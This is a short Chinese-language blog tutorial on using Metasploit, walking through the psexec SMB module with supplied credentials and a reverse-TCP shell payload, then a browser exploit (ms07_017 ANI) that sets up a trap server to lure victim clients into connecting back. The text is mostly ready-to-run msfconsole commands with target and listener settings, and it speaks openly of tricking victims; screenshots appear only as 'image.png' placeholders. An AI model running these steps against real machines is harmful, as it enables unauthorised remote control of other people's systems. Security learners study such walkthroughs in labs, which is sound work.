2018-11-23 metasploit 框架 exploit

2018-11-23  本文已影响2人  昨天今天下雨天1

▪ Active exploit

启动数据库,启动msf。


image.png

use exploit/windows/smb/psexec (利用对方windows系统的smb服务控制对方。)


image.png

show options (查看一下配置信息)

set RHOST 192.168.1.100 (设置目标IP)


image.png

set SMBUSER user1 (指定目标用户名)
set SMBPASS pass1 (指定目标密码)
利用该漏洞需要先知道对方的账号密码。


image.png

set PAYLOAD windows/shell/reverse_tcp (加载一个反弹shell脚本)


image.png

show options (查看一下配置信息,此处变为脚本的配置信息)

set LHOST 192.168.1.1 (设置反弹回的地址,也就是自己的机器)
set LPORT 4444 (设置监听端口)

show targets (展示一下targets)


image.png

exploit -j (静默执行,保存链接的session)


image.png

**防火墙开启时,该漏洞无法利用,所以需要采用欺骗客户端访问服务端的方式进行漏洞利用。步骤如下:
▪ Passive Exploits
use exploit/windows/browser/ms07_017_ani_loadimage_chunksize (启动模块)

set SRVHOST 192.168.1.1 (设置你需要被骗客户端访问的那个陷阱服务器)


image.png

set URIPATH / (设置服务器的url)

set PAYLOAD windows/shell/reverse_tcp (加载脚本,被动的陷阱服务)
set LHOST 192.168.1.1
set LPORT 4444
netstat -pantu | grep 4444 (查看一下4444端口状态)
exploit (等待被害客户端访问)

上一篇下一篇

猜你喜欢

热点阅读